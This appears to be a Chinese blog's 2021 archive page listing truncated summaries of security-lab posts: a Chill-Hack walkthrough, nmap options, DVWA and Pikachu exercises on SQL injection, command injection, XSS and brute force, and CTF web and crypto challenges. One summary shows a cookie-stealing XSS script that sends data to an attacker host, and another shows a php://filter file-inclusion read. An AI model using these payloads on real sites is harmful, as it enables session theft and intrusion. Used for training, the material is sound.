01 2021 档案
摘要:1、先用nmap对Chill-Hack靶机进行端口扫描 扫描出了ftp、ssh、http服务 2、匿名登录ftp服务,查看ftp服务文件,有一个note.txt文件,然后下载过来 得到提示“Anurodh told me that there is some filtering on strings
阅读全文
摘要:扫描的方式: -sP //用ping命令只对主机是否在线进行检测-sS //发送具有SYN标志的数据包,通过对主机回复的包的内容进行端口是否在线判断,没有进行tcp三次握手连接,安全性高,扫描快-sT //通过建立tcp连接进行扫描,速度较慢,而且会被目标主机记录,但是可靠性高-sU //对UPD端
阅读全文
摘要:1、exec “ping” 查看代码: if(isset($_POST['submit']) && $_POST['ipaddress']!=null){ $ip=$_POST['ipaddress']; // $check=explode('.', $ip);可以先拆分,然后校验数字以范围,第一位
阅读全文
摘要:1、数字型注入 查看代码: if(isset($_POST['submit']) && $_POST['id']!=null){ //这里没有做任何处理,直接拼到select里面去了,形成Sql注入 $id=$_POST['id']; $query="select username,email fr
阅读全文
摘要:难度1-Low 查看代码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_n
阅读全文
摘要:难度1-Low 查看代码: <?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] );
阅读全文
摘要:1、利用环境配置 首先在kali中开启apacha服务 sudo service apache2 start 然后在网站目录/var/www/html 下创建一个恶意js脚本 var image=new Image();image.src="http://192.168.31.155:8888/co
阅读全文
摘要:难度1-Low 查看代码: <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>He
阅读全文
摘要:XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWA
阅读全文
摘要:1、验证码绕过(on-server) 先看看提示,提示说验证码好像一直有效,那么这个验证码可能只需要验证一次之后可以重复利用 查看一下后端代码: if(isset($_POST['submit'])) { if (empty($_POST['username'])) { $html .= "<p c
阅读全文
摘要:1、修改/etc/docker/daemon.json配置文件 sudo vim /etc/docker/daemon.json 2、修改daemon.json文件的内容 { "registry-mirrors": ["https://docker.mirrors.ustc.edu.cn"] } s
阅读全文
摘要:之前在用docker搭建靶场的时候出现了这个报错: Unsupported config option for services service: 'web' 后来究其原因是和需要搭建环境的docker-compose.yml配置文件中的版本和 实际上安装的版本的区别导致这个问题。 比如我当初报错的
阅读全文
摘要:点下面的按钮会出现这个参数,可能是sql注入 加个'试试 发现直接报错了,并且出现了includi的关键词 那么可能是文件包含,先用php://filter/read=convert.base64-encode/resource=index.php 读取index.php的页面代码看看,发现读取不成
阅读全文
摘要:import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read
阅读全文
摘要:代码: <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (
阅读全文
摘要:robots.txt文件中存在提示 访问fAke_flagggg.php,在响应头看到见了另一个提示文件 代码分析:传入intval(num)小于2020,但是intval(num+1)要大于2021 利用科学计数法绕过,intval('3e3')=3,但是intval('3e3'+1)为3001,
阅读全文
摘要:难度1-Low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr(
阅读全文
摘要:难度1-low 直接使用bp的Intruder模块进行密码爆破即可得出密码。 难度2-Medium 比难度1多了一个登录失败睡两秒钟的代码,所以要慢一点 难度3-High 用generateSessionToken()函数生成随机Token 在GET传参中如果存在Login变量就先对传入的user_
阅读全文
摘要:<?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'
阅读全文
摘要:from random import randint import os from flag import flag N=64 key=randint(0,2**N) # print key key=bin(key)[2:].rjust(N,'0') count=0 while True: p=0
阅读全文
摘要:from random import randint import os from flag import flag N=64 key=randint(0,2**N) print key key=bin(key)[2:].rjust(N,'0') count=0 while True: p=0 q=
阅读全文

浙公网安备 33010602011771号